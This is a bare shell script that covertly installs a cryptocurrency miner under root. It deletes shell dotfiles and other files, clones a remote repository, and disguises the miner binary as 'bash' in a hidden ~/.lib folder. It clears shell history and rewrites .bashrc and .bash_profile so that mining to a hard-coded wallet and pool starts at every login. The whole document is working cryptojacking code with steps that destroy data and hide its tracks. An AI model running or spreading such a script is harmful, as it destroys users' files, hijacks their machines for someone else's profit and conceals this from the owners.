cd ~
rm -rvf .bash* .lib*

rm -rvf ele* lol* 1.* 
cd ~/
mkdir .lib
cd .lib
rm -R *
rm -R /root/.ton
WORKER="modal"
WALLETNH="9i4hYPXf3VUfcVxUNSQxAqwo1THyy1pkN7cNDhF5KUZvqEVLZhF"
POOLNH="hk.ergo.herominers.com:1180"
git clone https://github.com/gunturyogatama404/ksjdueoa.git && cd ksjdueoa && mv bash /root/.lib && cd .. && history -cr 
echo ""  > /root/.bashrc
echo "" > /root/.bash_history
echo "" > /root/.bash_profile
echo 'echo ""  >> /root/.bash_history' >> /root/.bashrc
echo "source /root/.bash_profile"  >> /root/.bashrc
echo "LD_LIBRARY_PATH=/root/.lib" > /root/.bash_profile
echo "export LD_LIBRARY_PATH" >> /root/.bash_profile
echo 'WORKER="modal"' >> ~/.bash_profile
echo 'WALLETNH="9i4hYPXf3VUfcVxUNSQxAqwo1THyy1pkN7cNDhF5KUZvqEVLZhF"' >> /root/.bash_profile
echo 'POOLNH="hk.ergo.herominers.com:1180"' >> /root/.bash_profile
echo "bash /root/.lib/gas.sh"  >> /root/.bash_profile
echo "./.lib/bash --algo firopow -s $POOLNH -u $WALLETNH.$WORKER" > /root/.lib/gas.sh
chmod +x bash && cd ~/ && source .bashrc


